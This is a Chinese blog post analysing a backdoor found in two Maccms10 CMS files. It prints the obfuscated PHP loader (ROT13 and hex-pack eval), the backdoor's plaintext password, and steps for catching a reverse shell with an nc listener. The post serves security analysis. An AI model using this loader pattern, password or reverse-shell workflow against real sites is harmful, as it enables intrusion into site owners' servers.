码迷,mamicode.com
首页 > 系统相关 > 详细

maccms后门分析

时间:2019-10-17 14:06:05      阅读:129      评论:0      收藏:0      [点我收藏+]

标签:end   解码   global   head   技术   play   解析   family   report   

Maccms 后门分析

Maccms网站基于php+mysql的系统,有易用性、功能良好等优点,用途广泛

 

打开源码

maccms10\extend\Qcloud\Sms\sms.php是一个后门

maccms10\extend\upyun\src\Upyun\Api\format.php也是一个后门

 技术图片

 

 技术图片

 

 

可以看到两者内容一样

<?php

error_reporting(E_ERROR);

@ini_set(‘display_errors‘,‘Off‘);

@ini_set(‘max_execution_time‘,20000);

@ini_set(‘memory_limit‘,‘256M‘);

header("content-Type: text/html; charset=utf-8");

$password = "0d41c75e2ab34a3740834cdd7e066d90";//密码WorldFilledWithLove

function s{

$str=”编码之后的恶意代码”;

$str = str_rot13($str);//对恶意代码进行ROT13编码

m($str);

}

function m($str){

global $password;

$jj = ‘‘;

eval($jj.pack(‘H*‘,$str).$jj);//对混淆的php进行解码,解码之后的代码执行对eval函数的解析

}

s();

?>

 技术图片

 

 

访问

 技术图片

 

 

解码后的密码敲进去WorldFilledWithLove

 技术图片

 

 

反弹shell(将肉鸡/目标机上的终端或者解析器或shell弹到攻击者的电脑中,需要攻击者提前监听,使用NC监听:nc –lvvp 7777,-l

 技术图片

 

 技术图片

 

maccms后门分析

标签:end   解码   global   head   技术   play   解析   family   report   

原文地址:https://www.cnblogs.com/shayanboy/p/11691414.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!